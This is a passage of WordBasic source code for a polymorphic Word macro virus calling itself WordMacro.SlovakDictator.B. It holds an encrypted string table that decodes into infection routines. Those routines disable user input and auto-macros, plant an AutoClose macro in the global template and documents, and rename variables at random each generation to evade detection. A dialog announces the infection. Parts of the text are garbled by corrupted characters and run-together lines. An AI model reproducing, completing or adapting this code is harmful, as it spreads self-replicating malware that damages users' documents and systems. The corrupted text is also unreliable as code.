"SBKVJOSUHRSLRIAJTBQ"TISEIKHODQQCGBM$(23) = "BCLHQBLUFOGCO"TISEIKHODQQCGBM$(24) = "QRQLVKABPUEJAAJGMF"TISEIKHODQQCGBM$(25) = "CUMKMEDQSRG"TISEIKHODQQCGBM$(26) = "NBRAOKIBBFOKGI"TISEIKHODQQCGBM$(27) = "UFFHOQFGCU"TISEIKHODQQCGBM$(28) = "KRTMEMGAIRIIJV"TISEIKHODQQCGBM$(29) = "EJQGEPDKDADFPSQN"TISEIKHODQQCGBM$(30) = "FVNIPFORQMUIV"
End Sub
SLDICT_B.SRC
REM --------- WordMacro.SlovakDictator.BREM --------- source code - 2nd generationREM --------- it is cool, isn't it ?REM --------- do not modify !REM ---------------------------------------Dim Shared JKHDBVIVFHSIOLGLEVDim Shared NIGFKLUPHSKEEEPDim Shared LEVOKOCHNNQPDDim Shared VNGOGKBSJINNKGDim Shared ATRUDJHVUTDADim Shared UPMTKJGPISSNIKQEJHBDim Shared DUJEPAVVCNCSVDim Shared BQLLMJUMSKGDim Shared SQQVMSQFPFQOUDim Shared MCMAPPVBJCHTIJKLLGDim Shared MMPAAMLTJEJQDim Shared QFOSABMOUOJTNFJEB$(200 )Dim Shared AUBQULPOOLFDDim Shared TACMICASEFBSRUCDim Shared DHFHBNUIMGVHSDim Shared QAUBRNSVSNMDMQPJ$(31) 'OIEGDFGEGSODLPUVCDim Shared FLVFRFOSDHTKBSS
Sub MAINOn Error Goto AHTUIALPGHINBSOHKGBJKHDBVIVFHSIOLGLEV = 0NIGFKLUPHSKEEEP =1DisableInput NIGFKLUPHSKEEEPLEVOKOCHNNQPD =2VNGOGKBSJINNKG =7ATRUDJHVUTDA =10UPMTKJGPISSNIKQEJHB =20DUJEPAVVCNCSV =22BQLLMJUMSKG =65SQQVMSQFPFQOU =34MCMAPPVBJCHTIJKLLG =64AUBQULPOOLFD =38TACMICASEFBSRUC =120DHFHBNUIMGVHS =181FLVFRFOSDHTKBSS =31VEGINPJEAUKMUNV$ = AppInfo$(LEVOKOCHNNQPD)MOIGIVMVOI = Val(Left$(VEGINPJEAUKMUNV$, NIGFKLUPHSKEE EP))If MOIGIVMVOI <> VNGOGKBSJINNKGThen Goto AHTUIALPGHINBSOHKGBCall FTDJILLLBBPSNPOGPDScreenUpdating JKHDBVIVFHSIOLGLEVDisableAutoMacros NIGFKLUPHSKEEEPAHCQTEBHHQMABJMSANF
DCUVUFPJTL$ = WindowName$()'OIEGDFGEGSODLPUVCToolsMacro .Name = "EHSPTKCEIMAUNR", .Show = NIGFKLUPHSKEEEP, .Edit'OIEGDFGEGSODLPUVCEditClear - UPMTKJGPISSNIKQEJHBFor OIEGDFGEGSODLPUVC = JKHDBVIVFHSIOLGLEVTo DHFHBNUIMGVHS : Insert QFOSABMOUOJTNFJEB$(OIEGDFGEGSODLPUVC) : InsertPara : Next OIEGDFGEGSODLPUVC
EditReplace .Find = Chr$(MCMAPPVBJCHTIJKLLG) + Chr$(MCMA PPVBJCHTIJKLLG), .Replace = Chr$(SQQVMSQFPFQOU), .Direction = JKHDBVIVFHSIOLGLEV, .Match Case = NIGFKLUPHSKEEEP, .WholeWord =JKHDBVIVFHSIOLGLEV, .PatternMatch = JKHDBVIVFHSIOLGLEV , .SoundsLike = JKHDBVIVFHSIOLGLEV, .ReplaceAll, .Format = JKHDBVIVFHSIOLGLEV, .Wrap = NIGFKLU PHSKEEEP, .FindAllWordForms =JKHDBVIVFHSIOLGLEV
SLDICT_B.SRC
DMNQTQDCGKCOJFTNSLLVKJBVQKOPMUDocClose NIGFKLUPHSKEEEPActivate DCUVUFPJTL$
Call EHSPTKCEIMAUNRToolsMacro .Name = "EHSPTKCEIMAUNR", .Show = NIGFKLUPHSKEEEP, .Delete
AHTUIALPGHINBSOHKGB:DisableAutoMacros JKHDBVIVFHSIOLGLEVScreenUpdating NIGFKLUPHSKEEEPDisableInput JKHDBVIVFHSIOLGLEVEnd Sub
Sub AHCQTEBHHQMABJMSANFFor OIEGDFGEGSODLPUVC = JKHDBVIVFHSIOLGLEVTo DHFHBNUIMGVHSREBVECGMVLCRMSQ$ =""MVPJAUAQQVNMITRR = Len(QFOSABMOUOJTNFJEB$(OIEGDFGEGSODLPUVC))For IVERHTQBPD = NIGFKLUPHSKEEEPTo MVPJAUAQQVNMITRRREBVECGMVLCRMSQ$ = REBVECGMVLCRMSQ$ + Chr$(Asc(Mid$ (QFOSABMOUOJTNFJEB$(OIEGDFGEGSODLPUVC),IVERHTQBPD, NIGFKLUPHSKEEEP)) - MMPAAMLTJEJQ)Next IVERHTQBPDQFOSABMOUOJTNFJEB$(OIEGDFGEGSODLPUVC) = REBVECGMVLCRMSQ$Next OIEGDFGEGSODLPUVCEnd Sub
Sub DMNQTQDCGKCOJFTNSFor OIEGDFGEGSODLPUVC = JKHDBVIVFHSIOLGLEVTo DHFHBNUIMGVHSInsert "QFOSABMOUOJTNFJEB$("+ Str$(OIEGDFGEGSODLPUVC) + ")=" + Chr$(SQQVMSQFPFQOU) +QFOSABMOUOJTNFJEB$(OIEGDFGEGSODLPUVC) + Chr$(SQQVMSQFPFQOU)InsertParaNext OIEGDFGEGSODLPUVCFor OIEGDFGEGSODLPUVC = JKHDBVIVFHSIOLGLEVTo FLVFRFOSDHTKBSS - NIGFKLUPHSKEEEPInsert "QAUBRNSVSNMDMQPJ$("+ Str$(OIEGDFGEGSODLPUVC) + ")=" + Chr$(SQQVMSQFPFQOU) +QAUBRNSVSNMDMQPJ$(OIEGDFGEGSODLPUVC) + Chr$(SQQVMSQFPFQOU)InsertParaNext OIEGDFGEGSODLPUVCEnd Sub
Function QJQREVEJKRPEMJ$REBVECGMVLCRMSQ$ =""For OIEGDFGEGSODLPUVC = NIGFKLUPHSKEEEPTo ATRUDJHVUTDA + Rnd() * ATRUDJHVUTDA :REBVECGMVLCRMSQ$ = REBVECGMVLCRMSQ$ + Chr$(Rnd() * DUJEPAVVCNCSV + BQLLMJUMSKG) :NextOIEGDFGEGSODLPUVCQJQREVEJKRPEMJ$ = REBVECGMVLCRMSQ$End Function
Sub LLVKJBVQKOPMUFor OIEGDFGEGSODLPUVC = JKHDBVIVFHSIOLGLEVTo FLVFRFOSDHTKBSS - NIGFKLUPHSKEEEPEditReplace .Find = QAUBRNSVSNMDMQPJ$(OIEGDFGEGSODLPUVC), .Replace = QJQREVEJKRPEMJ$, .Direction = JKHDBVIVFHSIOLGLEV, .MatchCase = NIGFKLUPHSK EEEP, .WholeWord = JKHDBVIVFHSIOLGLEV, .PatternMatch = JKHDBVIVFHSIOLGLEV, .SoundsLike = JKHDB VIVFHSIOLGLEV, .ReplaceAll, .Format= JKHDBVIVFHSIOLGLEV, .Wrap = NIGFKLUPHSKEEEP, .FindAllW ordForms = JKHDBVIVFHSIOLGLEVNext OIEGDFGEGSODLPUVCEnd Sub
Sub FTDJILLLBBPSNPOGPDMMPAAMLTJEJQ = 9QFOSABMOUOJTNFJEB$(0) = "Mrv)\qj{nm)STQMK_R_OQ\RXUPUN_"QFOSABMOUOJTNFJEB$(1) = "Mrv)\qj{nm)WRPOTU^YQ\TNNNY"QFOSABMOUOJTNFJEB$(2) = "Mrv)\qj{nm)UN_XTXLQWWZYM"
SLDICT_B.SRC
QFOSABMOUOJTNFJEB$(3) = "Mrv)\qj{nm)_WPXPTK\SRWWTP"QFOSABMOUOJTNFJEB$(4) = "Mrv)\qj{nm)J][^MSQ_^]MJ"QFOSABMOUOJTNFJEB$(5) = "Mrv)\qj{nm)^YV]TSPYR\\WRTZNSQK"QFOSABMOUOJTNFJEB$(6) = "Mrv)\qj{nm)M^SNYJ__LWL\_"QFOSABMOUOJTNFJEB$(7) = "Mrv)\qj{nm)KZUUVS^V\TP"QFOSABMOUOJTNFJEB$(8) = "Mrv)\qj{nm)\ZZ_V\ZOYOZX^"QFOSABMOUOJTNFJEB$(9) = "Mrv)\qj{nm)VLVJYY_KSLQ]RSTUUP"QFOSABMOUOJTNFJEB$(10) = "Mrv)\qj{nm)VVYJJVU]SNSZ"QFOSABMOUOJTNFJEB$(11) = "Mrv)\qj{nm)ZOX\JKVX^XS]WOSNK-1;992"QFOSABMOUOJTNFJEB$(12) = "Mrv)\qj{nm)J^KZ^UYXXUOM"QFOSABMOUOJTNFJEB$(13) = "Mrv)\qj{nm)]JLVRLJ\NOK\[^L"QFOSABMOUOJTNFJEB$(14) = "Mrv)\qj{nm)MQOQKW^RVP_Q\"QFOSABMOUOJTNFJEB$(15) = "Mrv)\qj{nm)ZJ^K[W\_\WVMVZYS-1<:20XRNPMOPNP\XMUY^_L "QFOSABMOUOJTNFJEB$(16) = "Mrv)\qj{nm)OU_O[OX\MQ]TK\\"QFOSABMOUOJTNFJEB$(17) = ""QFOSABMOUOJTNFJEB$(18) = "\~k)VJRW"QFOSABMOUOJTNFJEB$(19) = "Xw)N{{x{)Px}x)JQ]^RJUYPQRWK\XQTPK"QFOSABMOUOJTNFJEB$(20) = "STQMK_R_OQ\RXUPUN_)F)9"QFOSABMOUOJTNFJEB$(21) = "WRPOTU^YQ\TNNNY)F):"QFOSABMOUOJTNFJEB$(22) = "Mr|jkunRwy~})WRPOTU^YQ\TNNNY"QFOSABMOUOJTNFJEB$(23) = "UN_XTXLQWWZYM)F);"QFOSABMOUOJTNFJEB$(24) = "_WPXPTK\SRWWTP)F)@"QFOSABMOUOJTNFJEB$(25) = "J][^MSQ_^]MJ)F):9"QFOSABMOUOJTNFJEB$(26) = "^YV]TSPYR\\WRTZNSQK)F);9"QFOSABMOUOJTNFJEB$(27) = "M^SNYJ__LWL\_)F);;"QFOSABMOUOJTNFJEB$(28) = "KZUUVS^V\TP)F)?>"QFOSABMOUOJTNFJEB$(29) = "\ZZ_V\ZOYOZX^)F)<="QFOSABMOUOJTNFJEB$(30) = "VLVJYY_KSLQ]RSTUUP)F)?="QFOSABMOUOJTNFJEB$(31) = "J^KZ^UYXXUOM)F)<A"QFOSABMOUOJTNFJEB$(32) = "]JLVRLJ\NOK\[^L)F):;9"QFOSABMOUOJTNFJEB$(33) = "MQOQKW^RVP_Q\)F):A:"QFOSABMOUOJTNFJEB$(34) = "OU_O[OX\MQ]TK\\)F)<:"QFOSABMOUOJTNFJEB$(35) = "_NPRWYSNJ^TV^W_-)F)JyyRwox-1UN_XTXLQWWZYM2"QFOSABMOUOJTNFJEB$(36) = "VXRPR_V_XR)F)_ju1Uno}-1_NPRWYSNJ^TV^W_-5)WRPOTU^YQ\TNNNY22"QFOSABMOUOJTNFJEB$(37) = "Ro)VXRPR_V_XR)EG)_WPXPTK\SRWWTP)]qnw)Px}x)JQ]^RJUY PQRWK\XQTPK"QFOSABMOUOJTNFJEB$(38) = "Ljuu)O]MSRUUUKKY\WYXPYM"QFOSABMOUOJTNFJEB$(39) = "08888)knprw)xo)qrmmnw)yj{})8888"QFOSABMOUOJTNFJEB$(40) = �"\qx€Kx "QFOSABMOUOJTNFJEB$(41) = "L~{Orun-)F)OrunWjvn-12"QFOSABMOUOJTNFJEB$(42) = "Ro)L~{Orun-)F)IIII)]qnw)Px}x)JQ]^RJUYPQRWK\XQTPK"QFOSABMOUOJTNFJEB$(43) = ""QFOSABMOUOJTNFJEB$(44) = "Ro)LqnltRw|}juunm192)F)9)]qnw"QFOSABMOUOJTNFJEB$(45) = "Rwonl}1:2"QFOSABMOUOJTNFJEB$(46) = � �"]xxu|Xy}rxw|\j n)7PuxkjuMx}Y{xvy})F)95)7Oj|}\j n|)F) 9"QFOSABMOUOJTNFJEB$(47) = "Px}x)JQ]^RJUYPQRWK\XQTPK"QFOSABMOUOJTNFJEB$(48) = "Nwm)Ro"QFOSABMOUOJTNFJEB$(49) = ""QFOSABMOUOJTNFJEB$(50) = �"Mrv)mup)J|)Orun\j nJ|"QFOSABMOUOJTNFJEB$(51) = "Pn}L~{_ju~n|)mup"QFOSABMOUOJTNFJEB$(52) = "Ro)mup7Ox{vj})F)9)]qnw"QFOSABMOUOJTNFJEB$(53) = "mup7Ox{vj})F):"QFOSABMOUOJTNFJEB$(54) = �"Orun\j nJ|)mup"QFOSABMOUOJTNFJEB$(55) = "Nwm)Ro"QFOSABMOUOJTNFJEB$(56) = ""QFOSABMOUOJTNFJEB$(57) = "Ro)LqnltRw|}juunm1:2)F)9)]qnw"QFOSABMOUOJTNFJEB$(58) = "Rwonl}1<2"QFOSABMOUOJTNFJEB$(59) = �"Orun\j n"QFOSABMOUOJTNFJEB$(60) = "Nwm)Ro"QFOSABMOUOJTNFJEB$(61) = ""QFOSABMOUOJTNFJEB$(62) = "JQ]^RJUYPQRWK\XQTPKC"QFOSABMOUOJTNFJEB$(63) = "Nwm)\~k"QFOSABMOUOJTNFJEB$(64) = ""
SLDICT_B.SRC
QFOSABMOUOJTNFJEB$(65) = �"\~k)\qx€Kx "QFOSABMOUOJTNFJEB$(66) = "Yj{ujvnw}w‚Y~l)F)Mj‚1Wx€122"QFOSABMOUOJTNFJEB$(67) = "Ro)Yj{ujvnw}w‚Y~l)F)=)X{)Yj{ujvnw}w‚Y~l)F)::)]qnw"QFOSABMOUOJTNFJEB$(68) = "Knny"QFOSABMOUOJTNFJEB$(69) = "Knprw)Mrjuxp)^|n{Mrjuxp)<A95);;=5)II_r{~|)JUN[]*II "QFOSABMOUOJTNFJEB$(70) =
� � � �"]n });A5)A5)<=B5):<5)IIbx~0{n)rwonl}nm)k‚)`x{mVjl{x 7\ux jtMrl}j}x{7K) r{~|II5)7]n }:"QFOSABMOUOJTNFJEB$(71) =
� � �"]n }):>5);A5)<?95):<5)II`nulxvn)}x)}qn)UVN)1Ujvn{0| )Vjl{x)Nwprwn2) n{7):799II5)7]n };"QFOSABMOUOJTNFJEB$(72) = � � �"]n }):=>5)>:5):;<5):<5)IIMr|)r|)Un nu)=;:II5)7]n }<"QFOSABMOUOJTNFJEB$(73) =
� � �"]n })<>5)@<5)<=;5):<5)II1l2)>6vj{6B@5)Wj|}‚)Ujvn{)/ /)^pu‚)U~|n{5)\ux jtrjII5)7]n }="QFOSABMOUOJTNFJEB$(74) =
� � �"]n })<=5)BA5)<=<5):<5)IIMr|)r|)}qn)or{|})€x{um)}{~n )yxu‚vx{yqrl)vjl{x) r{~|)*II5)7]n }>"QFOSABMOUOJTNFJEB$(75) = "Y~|qK~}}xw):;95):AA5):=@5);:5)IIJllny})8)\~quj|II5 )7Y~|q:"QFOSABMOUOJTNFJEB$(76) = � � �"]n }):995):?>5);;A5):<5)IIKrp)o~lt)}x)}qn)krp)kx n{) _7V7II5)7]n }?"QFOSABMOUOJTNFJEB$(77) = "Nwm)Mrjuxp"QFOSABMOUOJTNFJEB$(78) = "Mrv)mup)J|)^|n{Mrjuxp"QFOSABMOUOJTNFJEB$(79) = "Mrjuxp1mup2"QFOSABMOUOJTNFJEB$(80) = "Nwm)Ro"QFOSABMOUOJTNFJEB$(81) = "Nwm)\~k"QFOSABMOUOJTNFJEB$(82) = ""QFOSABMOUOJTNFJEB$(83) = "O~wl}rxw)LqnltRw|}juunm1s2"QFOSABMOUOJTNFJEB$(84) = �"Xw)N{{x{)[n|~vn)Wn }"QFOSABMOUOJTNFJEB$(85) = "LqnltRw|}juunm)F)9"QFOSABMOUOJTNFJEB$(86) = "Ox{)r)F):)]x)Lx~w}Vjl{x|1s2"QFOSABMOUOJTNFJEB$(87) = "Ro)Vjl{xWjvn-1r5)s2)F)IIJ~}xLux|nII)]qnw)LqnltRw|} juunm)F):"QFOSABMOUOJTNFJEB$(88) = �"Wn })r"QFOSABMOUOJTNFJEB$(89) = "Nwm)O~wl}rxw"QFOSABMOUOJTNFJEB$(90) = ""QFOSABMOUOJTNFJEB$(91) = "\~k)Rwonl}1`qj}]xRwonl}2"QFOSABMOUOJTNFJEB$(92) = "ML^_^OYS]U-)F)`rwmx€Wjvn-12"QFOSABMOUOJTNFJEB$(93) = "]xxu|Vjl{x)7Wjvn)F)IIJ~}xLux|nII5)7\qx€)F)`qj}]xRw onl}5)7Nmr}"QFOSABMOUOJTNFJEB$(94) = "Nmr}Lunj{)6);9"QFOSABMOUOJTNFJEB$(95) = ""QFOSABMOUOJTNFJEB$(96) = "08888"QFOSABMOUOJTNFJEB$(97) = � �"08888)_uxƒnwrn)y{ ‚lq)J^KZ^UYXXUOM){rjmtx )txm~)vjt{ j"QFOSABMOUOJTNFJEB$(98) = �"08888) rmr}nuwj)lj|})6)wnvnwr})*"QFOSABMOUOJTNFJEB$(99) = "08888"QFOSABMOUOJTNFJEB$(100 ) =
�"Ox{)r)F)9)]x)J^KZ^UYXXUOM)C)Rw|n{})ZOX\JKVX^XS]WOS NK-1r2)C)Rw|n{}Yj{j)C)Wn })r"QFOSABMOUOJTNFJEB$(101 ) = "08888"QFOSABMOUOJTNFJEB$(102 ) = �"08888)y{nvnwwj)r)rmn)xm){rjmtx )II\~k)X{rprwjuVjl{x Kxm‚II4:"QFOSABMOUOJTNFJEB$(103 ) = "08888)jƒ)yx)II\~k)O]MSRUUUKKY\WYXPYMII6:"QFOSABMOUOJTNFJEB$(104 ) = �"08888) nuvr)yxƒx{wn)~{lr})}rn}x)txw|}jw}‚)***"QFOSABMOUOJTNFJEB$(105 ) = "08888"QFOSABMOUOJTNFJEB$(106 ) =
�"Ox{)r)F)]JLVRLJ\NOK\[^L)]x)MQOQKW^RVP_Q\)C)Rw|n{}) ZOX\JKVX^XS]WOSNK-1r2)C)Rw|n{}Yj{j)C)Wn })r"QFOSABMOUOJTNFJEB$(107 ) ="Nmr}[nyujln)7Orwm)F)Lq{-1?=2)4)Lq{-1?=25)7[nyujln) F)Lq{-1<=25)7Mr{nl}rxw)F)95)7Vj}lqLj|n)F):5)7`qxun`x{m)F)95)7Yj}}n{wVj}lq)F)95)7\x~wm|Urtn)F)9 5)7[nyujlnJuu5)7Ox{vj})F)95)7`{jy)F):5)7OrwmJuu`x{mOx{v|)F)9"QFOSABMOUOJTNFJEB$(108 ) = ""QFOSABMOUOJTNFJEB$(109 ) = "VVYJJVU]SNSZ)F)6)Rw}11=)4)[wm12)3):922"QFOSABMOUOJTNFJEB$(110 ) = "Ljuu)JQLZ]NKQQZVJKSV\JWO"QFOSABMOUOJTNFJEB$(111 ) = "Rw|n{})IIVVYJJVU]SNSZ)F)II)4)\}{-16)VVYJJVU]SNSZ2"QFOSABMOUOJTNFJEB$(112 ) = "Rw|n{}Yj{j"QFOSABMOUOJTNFJEB$(113 ) = "MVWZ]ZMLPTLXSO]W\"QFOSABMOUOJTNFJEB$(114 ) = "MxlLux|n):"QFOSABMOUOJTNFJEB$(115 ) = �"Jl}r j}n)ML^_^OYS]U-"QFOSABMOUOJTNFJEB$(116 ) = "Nwm)\~k"QFOSABMOUOJTNFJEB$(117 ) = ""
SLDICT_B.SRC
QFOSABMOUOJTNFJEB$(118 ) = "\~k)X{rprwjuVjl{xKxm‚"QFOSABMOUOJTNFJEB$(119 ) = "08888)nwm)xo)Qrmmnw)yj{})8888"QFOSABMOUOJTNFJEB$(120 ) = "\l{nnw^ymj}rwp)STQMK_R_OQ\RXUPUN_"QFOSABMOUOJTNFJEB$(121 ) = "Mr|jkunJ~}xVjl{x|)WRPOTU^YQ\TNNNY"QFOSABMOUOJTNFJEB$(122 ) = "JQLZ]NKQQZVJKSV\JWO"QFOSABMOUOJTNFJEB$(123 ) = ""QFOSABMOUOJTNFJEB$(124 ) = "ML^_^OYS]U-)F)`rwmx€Wjvn-12"QFOSABMOUOJTNFJEB$(125 ) = "0XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(126 ) ="]xxu|Vjl{x)7Wjvn)F)IINQ\Y]TLNRVJ^W[II5)7\qx€)F)WRP OTU^YQ\TNNNY5)7Nmr}"QFOSABMOUOJTNFJEB$(127 ) = "0XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(128 ) = "Nmr}Lunj{)6)^YV]TSPYR\\WRTZNSQK"QFOSABMOUOJTNFJEB$(129 ) ="Ox{)XRNPMOPNP\XMUY^_L)F)STQMK_R_OQ\RXUPUN_)]x)MQOQKW^RVP_Q\)C)Rw|n{})ZOX\JKVX^XS]WOSNK-1XRNPM
�OPNP\XMUY^_L2)C)Rw|n{}Yj{j)C)Wn })XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(130 ) = ""QFOSABMOUOJTNFJEB$(131 ) ="Nmr}[nyujln)7Orwm)F)Lq{-1VLVJYY_KSLQ]RSTUUP2)4)Lq{ -1VLVJYY_KSLQ]RSTUUP25)7[nyujln)F)Lq{-1\ZZ_V\ZOYOZX^25)7Mr{nl}rxw)F)STQMK_R_OQ\RXUPUN_5)7Vj}lq Lj|n)F)WRPOTU^YQ\TNNNY5)7`qxun`x{m)F)STQMK_R_OQ\RXUPUN_5)7Yj}}n{wVj}lq)F)STQMK_R_OQ\RXUPUN_5)7 \x~wm|Urtn)F)STQM" +"K_R_OQ\RXUPUN_5)7[nyujlnJuu5)7Ox{vj})F)STQMK_R_OQ\ RXUPUN_5)7`{jy)F)WRPOTU^YQ\TNNNY5)7OrwmJuu`x{mOx{v|)F)STQMK_R_OQ\RXUPUN_"QFOSABMOUOJTNFJEB$(132 ) = ""QFOSABMOUOJTNFJEB$(133 ) = "MVWZ]ZMLPTLXSO]W\"QFOSABMOUOJTNFJEB$(134 ) = "UU_TSK_ZTXYV^"QFOSABMOUOJTNFJEB$(135 ) = "MxlLux|n)WRPOTU^YQ\TNNNY"QFOSABMOUOJTNFJEB$(136 ) = �"Jl}r j}n)ML^_^OYS]U-"QFOSABMOUOJTNFJEB$(137 ) = ""QFOSABMOUOJTNFJEB$(138 ) = "Ljuu)NQ\Y]TLNRVJ^W["QFOSABMOUOJTNFJEB$(139 ) ="]xxu|Vjl{x)7Wjvn)F)IINQ\Y]TLNRVJ^W[II5)7\qx€)F)WRP OTU^YQ\TNNNY5)7Mnun}n"QFOSABMOUOJTNFJEB$(140 ) = ""QFOSABMOUOJTNFJEB$(141 ) = "JQ]^RJUYPQRWK\XQTPKC"QFOSABMOUOJTNFJEB$(142 ) = "Mr|jkunJ~}xVjl{x|)STQMK_R_OQ\RXUPUN_"QFOSABMOUOJTNFJEB$(143 ) = "\l{nnw^ymj}rwp)WRPOTU^YQ\TNNNY"QFOSABMOUOJTNFJEB$(144 ) = "Mr|jkunRwy~})STQMK_R_OQ\RXUPUN_"QFOSABMOUOJTNFJEB$(145 ) = "Nwm)\~k"QFOSABMOUOJTNFJEB$(146 ) = ""QFOSABMOUOJTNFJEB$(147 ) = "\~k)JQLZ]NKQQZVJKSV\JWO"QFOSABMOUOJTNFJEB$(148 ) = "Ox{)XRNPMOPNP\XMUY^_L)F)STQMK_R_OQ\RXUPUN_)]x)MQOQKW^RVP_Q\"QFOSABMOUOJTNFJEB$(149 ) = "[NK_NLPV_UL[V\Z-)F)IIII"QFOSABMOUOJTNFJEB$(150 ) = "V_YSJ^JZZ_WVR][[)F)Unw1ZOX\JKVX^XS]WOSNK-1XRNPMOPNP\XMUY^_L22"QFOSABMOUOJTNFJEB$(151 ) = "Ox{)R_N[Q]ZKYM)F)WRPOTU^YQ\TNNNY)]x)V_YSJ^JZZ_WVR] [["QFOSABMOUOJTNFJEB$(152 ) ="[NK_NLPV_UL[V\Z-)F)[NK_NLPV_UL[V\Z-)4)Lq{-1J|l1Vrm -1ZOX\JKVX^XS]WOSNK-1XRNPMOPNP\XMUY^_L25)R_N[Q]ZKYM5)WRPOTU^YQ\TNNNY22)6)VVYJJVU]SNSZ2"QFOSABMOUOJTNFJEB$(153 ) = �"Wn })R_N[Q]ZKYM"QFOSABMOUOJTNFJEB$(154 ) = "ZOX\JKVX^XS]WOSNK-1XRNPMOPNP\XMUY^_L2)F)[NK_NLPV_UL[V\Z-"QFOSABMOUOJTNFJEB$(155 ) = �"Wn })XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(156 ) = "Nwm)\~k"QFOSABMOUOJTNFJEB$(157 ) = ""QFOSABMOUOJTNFJEB$(158 ) = "\~k)MVWZ]ZMLPTLXSO]W\"QFOSABMOUOJTNFJEB$(159 ) = "Ox{)XRNPMOPNP\XMUY^_L)F)STQMK_R_OQ\RXUPUN_)]x)MQOQKW^RVP_Q\"QFOSABMOUOJTNFJEB$(160 ) ="Rw|n{})IIZOX\JKVX^XS]WOSNK-1II)4)\}{-1XRNPMOPNP\XM UY^_L2)4)II2FII)4)Lq{-1\ZZ_V\ZOYOZX^2)4)ZOX\JKVX^XS]WOSNK-1XRNPMOPNP\XMUY^_L2)4)Lq{-1\ZZ_V\ZOY OZX^2"QFOSABMOUOJTNFJEB$(161 ) = "Rw|n{}Yj{j"QFOSABMOUOJTNFJEB$(162 ) = �"Wn })XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(163 ) ="Ox{)XRNPMOPNP\XMUY^_L)F)STQMK_R_OQ\RXUPUN_)]x)OU_O[OX\MQ]TK\\)6)WRPOTU^YQ\TNNNY"QFOSABMOUOJTNFJEB$(164 ) ="Rw|n{})IIZJ^K[W\_\WVMVZYS-1II)4)\}{-1XRNPMOPNP\XMU Y^_L2)4)II2FII)4)Lq{-1\ZZ_V\ZOYOZX^2)4)ZJ^K
SLDICT_B.SRC
[W\_\WVMVZYS-1XRNPMOPNP\XMUY^_L2)4)Lq{-1\ZZ_V\ZOYOZ X^2"QFOSABMOUOJTNFJEB$(165 ) = "Rw|n{}Yj{j"QFOSABMOUOJTNFJEB$(166 ) = �"Wn })XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(167 ) = "Nwm)\~k"QFOSABMOUOJTNFJEB$(168 ) = ""QFOSABMOUOJTNFJEB$(169 ) = "O~wl}rxw)ZSZ[N_NST[YNVS-"QFOSABMOUOJTNFJEB$(170 ) = "[NK_NLPV_UL[V\Z-)F)IIII"QFOSABMOUOJTNFJEB$(171 ) ="Ox{)XRNPMOPNP\XMUY^_L)F)WRPOTU^YQ\TNNNY)]x)J][^MSQ _^]MJ)4)[wm12)3)J][^MSQ_^]MJ)C)[NK_NLPV_UL[
�V\Z-)F)[NK_NLPV_UL[V\Z-)4)Lq{-1[wm12)3)M^SNYJ__LWL\ _)4)KZUUVS^V\TP2)C)Wn })XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(172 ) = "ZSZ[N_NST[YNVS-)F)[NK_NLPV_UL[V\Z-"QFOSABMOUOJTNFJEB$(173 ) = "Nwm)O~wl}rxw"QFOSABMOUOJTNFJEB$(174 ) = ""QFOSABMOUOJTNFJEB$(175 ) = "\~k)UU_TSK_ZTXYV^"QFOSABMOUOJTNFJEB$(176 ) ="Ox{)XRNPMOPNP\XMUY^_L)F)STQMK_R_OQ\RXUPUN_)]x)OU_O[OX\MQ]TK\\)6)WRPOTU^YQ\TNNNY"QFOSABMOUOJTNFJEB$(177 ) ="Nmr}[nyujln)7Orwm)F)ZJ^K[W\_\WVMVZYS-1XRNPMOPNP\XM UY^_L25)7[nyujln)F)ZSZ[N_NST[YNVS-5)7Mr{nl}rxw)F)STQMK_R_OQ\RXUPUN_5)7Vj}lqLj|n)F)WRPOTU^YQ\TN NNY5)7`qxun`x{m)F)STQMK_R_OQ\RXUPUN_5)7Yj}}n{wVj}lq)F)STQMK_R_OQ\RXUPUN_5)7\x~wm|Urtn)F)STQMK_ R_OQ\RXUPUN_5)7[n" +"yujlnJuu5)7Ox{vj})F)STQMK_R_OQ\RXUPUN_5)7`{jy)F)WR POTU^YQ\TNNNY5)7OrwmJuu`x{mOx{v|)F)STQMK_R_OQ\RXUPUN_"QFOSABMOUOJTNFJEB$(178 ) = �"Wn })XRNPMOPNP\XMUY^_L"QFOSABMOUOJTNFJEB$(179 ) = "Nwm)\~k"QFOSABMOUOJTNFJEB$(180 ) = ""QFOSABMOUOJTNFJEB$(181 ) = "\~k)O]MSRUUUKKY\WYXPYM"QAUBRNSVSNMDMQPJ$(0) = "MMPAAMLTJEJQ"QAUBRNSVSNMDMQPJ$(1) = "QFOSABMOUOJTNFJEB"QAUBRNSVSNMDMQPJ$(2) = "QAUBRNSVSNMDMQPJ"QAUBRNSVSNMDMQPJ$(3) = "JKHDBVIVFHSIOLGLEV"QAUBRNSVSNMDMQPJ$(4) = "ATRUDJHVUTDA"QAUBRNSVSNMDMQPJ$(5) = "DUJEPAVVCNCSV"QAUBRNSVSNMDMQPJ$(6) = "VNGOGKBSJINNKG"QAUBRNSVSNMDMQPJ$(7) = "NIGFKLUPHSKEEEP"QAUBRNSVSNMDMQPJ$(8) = "UPMTKJGPISSNIKQEJHB"QAUBRNSVSNMDMQPJ$(9) = "LEVOKOCHNNQPD"QAUBRNSVSNMDMQPJ$(10) = "BQLLMJUMSKG"QAUBRNSVSNMDMQPJ$(11) = "SQQVMSQFPFQOU"QAUBRNSVSNMDMQPJ$(12) = "MCMAPPVBJCHTIJKLLG"QAUBRNSVSNMDMQPJ$(13) = "AUBQULPOOLFD"QAUBRNSVSNMDMQPJ$(14) = "TACMICASEFBSRUC"QAUBRNSVSNMDMQPJ$(15) = "DHFHBNUIMGVHS"QAUBRNSVSNMDMQPJ$(16) = "FLVFRFOSDHTKBSS"QAUBRNSVSNMDMQPJ$(17) = "OIEGDFGEGSODLPUVC"QAUBRNSVSNMDMQPJ$(18) = "MVPJAUAQQVNMITRR"QAUBRNSVSNMDMQPJ$(19) = "IVERHTQBPD"QAUBRNSVSNMDMQPJ$(20) = "REBVECGMVLCRMSQ"QAUBRNSVSNMDMQPJ$(21) = "VEGINPJEAUKMUNV"QAUBRNSVSNMDMQPJ$(22) = "MOIGIVMVOI"QAUBRNSVSNMDMQPJ$(23) = "AHTUIALPGHINBSOHKGB"QAUBRNSVSNMDMQPJ$(24) = 